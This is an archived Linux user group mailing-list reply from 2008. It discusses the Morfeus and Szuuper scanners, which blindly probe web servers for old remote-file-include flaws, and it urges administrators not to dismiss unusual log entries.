George A. Theall on 4 Nov 2008 18:48:00 -0800

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

Re: [PLUG] weird process?

On Tue, Nov 04, 2008 at 08:49:36PM -0500, Michael Lazin wrote:

>    I am not familiar with the .bs extension, but without the =http string a
>    GET in the access logs was most likely not a successful hack, even if it
>    is a 200, but I would be curious to see the whole log entry. 

Google turns up a number of hits -- I'll leave it to you to look there
if you're really curious. 

Morfeus, and a newer variant called Szuuper, generally try to exploit a
class of known vulnerabilities (remote file includes), albeit blindly. 
They just run through their list of affected scripts and parameters and
iterate over some directory names.  At various times, I've looked
through log entries from the scanners -- the vulnerabilities they try to
exploit are generally pretty old.  And often in marginal software. is different, though.  I haven't found a specific
vulnerability involving it.  Nor am I even sure which application(s)
include a file with that name.  There's some speculation it's associated
with Drupal (eg, see <>), although I've
not come across it there.  Maybe it's a red herring, a way to see if the
server responds to requests for invalid pages with a 200 response code. 
Or maybe there is a vulnerability involving that file. 

The point, though, is not so much to understand what this particular
request is trying to do but to suggest that people keep an open mind
when investigating unusual activity and not dismiss it outright because
they don't consider themselves a particularly appealling target.

Philadelphia Linux Users Group         --
Announcements -
General Discussion  --